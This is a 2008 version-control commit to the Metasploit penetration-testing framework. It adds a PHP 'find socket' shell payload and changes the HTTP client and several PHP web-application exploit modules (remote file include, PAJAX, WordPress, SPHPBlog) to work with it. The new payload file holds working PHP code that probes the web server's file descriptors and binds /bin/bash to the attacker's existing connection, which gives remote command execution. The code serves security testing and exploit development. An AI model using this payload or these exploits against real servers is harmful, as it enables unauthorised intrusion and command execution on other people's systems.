initial commit of php findsock. This patch makes all http connections global and removes the "close if (!pipelining)" checks, so beware of bugs.

git-svn-id: file:///home/svn/framework3/trunk@5678 4d416f70-5f16-0410-b530-b9f4589650da
unstable
James Lee 2008-09-24 04:41:51 +00:00
parent ddc47955f2
commit 36a06e7576
12 changed files with 147 additions and 10 deletions

View File

@ -36,6 +36,10 @@ class CommandShell
"Command shell"
end
def run_cmd(cmd)
write_shell(cmd)
return rstream.get
end
#
# Calls the class method.
#
@ -54,7 +58,12 @@ class CommandShell
# Read from the command shell.
#
def read_shell(length = nil)
return rstream.read(length)
if length.nil?
rv = rstream.get
else
rv = rstream.read(length)
end
return rv
end
#

View File

@ -110,13 +110,15 @@ module Exploit::Remote::HttpClient
)
# If this connection is global, persist it
if (opts['global'])
# No reason for the socket not to be global and it allows findsock to
# work.
#if (opts['global'])
if (self.client)
disconnect
end
self.client = nclient
end
#end
return nclient
end

View File

@ -123,6 +123,8 @@ protected
Rex::ThreadSafe.sleep(1.5)
end
# Make sure the read buffer is empty before we test for a shell
sock.get_once(-1,1)
# Check to see if the shell exists
sock.put("\necho #{ebuf}\n")

View File

@ -24,7 +24,8 @@ class Msf::Module::Author
'skylined' => 'skylined' + 0x40.chr + 'edup.tudelft.nl',
'patrick' => 'patrick' + 0x40.chr + 'aushack.com',
'ramon' => 'ramon' + 0x40.chr + 'risesecurity.org',
'I)ruid' => 'druid' + 0x40.chr + 'caughq.org'
'I)ruid' => 'druid' + 0x40.chr + 'caughq.org',
'egypt' => 'egypt' + 0x40.chr + 'metasploit.com'
}
#

View File

@ -95,7 +95,14 @@ protected
# Check to see if the user wants to abort.
#
def _interrupt
user_want_abort?
begin
user_want_abort?
rescue Interrupt
# The user hit ctrl-c while we were handling a ctrl-c, send a
# literal ctrl-c to the shell. XXX Doesn't actually work.
#$stdout.puts("\n[*] interrupted interrupt, sending literal ctrl-c\n")
#$stdout.puts(run_cmd("\x03"))
end
end
#

View File

@ -54,6 +54,7 @@ module Stream
# This method reads data of the supplied length from the stream.
#
def read(length = nil, opts = {})
# XXX handle length being nil
begin
fd.sysread(length)
rescue IOError

View File

@ -315,7 +315,7 @@ class Client
resp.max_data = config['read_max_data']
# Tell the remote side if we aren't pipelining
conn.shutdown(::Socket::SHUT_WR) if (!pipelining?)
#conn.shutdown(::Socket::SHUT_WR) if (!pipelining?)
# Wait at most t seconds for the full response to be read in. We only
# do this if t was specified as a negative value indicating an infinite
@ -369,15 +369,17 @@ class Client
end
rescue EOFError
return nil
rescue ::TimeoutError, ::Timeout::Error
#$stdout.puts("timeout\n")
end
} if (t)
# Close our side if we aren't pipelining
close if (!pipelining?)
#close if (!pipelining?)
# if the server said stop pipelining, we listen...
if resp['Connection'] == 'close'
close
#close
end
# XXX - How should we handle this?

View File

@ -43,6 +43,10 @@ class Exploits::Unix::Webapp::Pajax_Execute < Msf::Exploit::Remote
'Payload' =>
{
'DisableNops' => true,
'Compat' =>
{
'ConnectionType' => 'find',
},
'Space' => 4000,
},
'Platform' => 'php',

View File

@ -26,7 +26,7 @@ class Exploits::Unix::Webapp::PHP_INCLUDE < Msf::Exploit::Remote
'Description' => %q{
Exploits things like <?php include($_GET['path']); ?>
},
'Author' => [ 'hdm' , 'egypt <egypt@nmt.edu>'],
'Author' => [ 'hdm' , 'egypt' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
@ -37,6 +37,13 @@ class Exploits::Unix::Webapp::PHP_INCLUDE < Msf::Exploit::Remote
'Payload' =>
{
'DisableNops' => true,
'Compat' =>
{
# By adding {'global' => true} to the connect
# options we get find shell compatibility for free
# in php exploits.
'ConnectionType' => 'find',
},
'Space' => 32768,
},
'Platform' => 'php',
@ -57,8 +64,9 @@ class Exploits::Unix::Webapp::PHP_INCLUDE < Msf::Exploit::Remote
timeout = 0.01
uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.uri_encode(php_include_url))
print_status("Trying uri #{uri}")
response = send_request_raw({ 'uri' => uri },timeout)
response = send_request_raw({ 'global' => true, 'uri' => uri },timeout)
handler
end
end

View File

@ -42,6 +42,10 @@ class Exploits::Unix::Webapp::Wordpress_LastPost_Execution < Msf::Exploit::Remot
'Payload' =>
{
'DisableNops' => true,
'Compat' =>
{
'ConnectionType' => 'find',
},
'Space' => 512,
},
'Platform' => 'php',

View File

@ -45,6 +45,10 @@ class Exploits::Unix::Webapp::SPHPBlog_File_Upload < Msf::Exploit::Remote
'Payload' =>
{
'DisableNops' => true,
'Compat' =>
{
'ConnectionType' => 'find',
},
'Space' => 1024,
},
'Platform' => 'php',

View File

@ -0,0 +1,93 @@
##
# $Id: bind_php.rb 5546 2008-07-01 01:44:56Z egypt $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
require 'msf/core/payload/php'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/core/handler/find_shell'
module Msf
module Payloads
module Singles
module Php
module ShellFindsock
include Msf::Payload::Single
include Msf::Payload::Php
def initialize(info = {})
super(merge_info(info,
'Name' => 'PHP Command Shell, Find Port',
'Version' => '$Revision: 5546 $',
'Description' => %Q{
Spawn a shell on the established connection to
the webserver. Only tested on Apache but it
might work on other web servers that leak file
descriptors to child processes.
},
'Author' => [ 'egypt <egypt@metasploit.com>' ],
'License' => BSD_LICENSE,
'Platform' => 'php',
'Handler' => Msf::Handler::FindShell,
'Session' => Msf::Sessions::CommandShell,
'Arch' => ARCH_PHP
))
end
def php_findsock
#cmd = Rex::Text.encode_base64(datastore['CMD'])
dis = '$' + Rex::Text.rand_text_alpha(rand(4) + 4)
shell = <<END_OF_PHP_CODE
error_reporting(E_ALL);
print("<html><body>");
flush();
error_log("Looking for file descriptor");
$fd = 13;
for ($i = 3; $i < 50; $i++) {
$foo = system("/bin/bash 2>/dev/null <&$i -c 'echo $i'");
if ($foo != $i) {
$fd = $i - 1;
break;
}
}
error_log("Found it ($fd)");
print("</body></html>\n\n");
flush();
$c = "/bin/bash <&$fd >&$fd 2>&$fd";
system($c);
END_OF_PHP_CODE
#function mysystem(){
# #{php_preamble({:disabled_varname => dis})}
# #{php_system_block({:cmd_varname=>'$c', :disabled_varname => dis, :output_varname => '$out'})}
# return $out;
#}
return shell
end
#
# Constructs the payload
#
def generate
return php_findsock
end
end
end end end end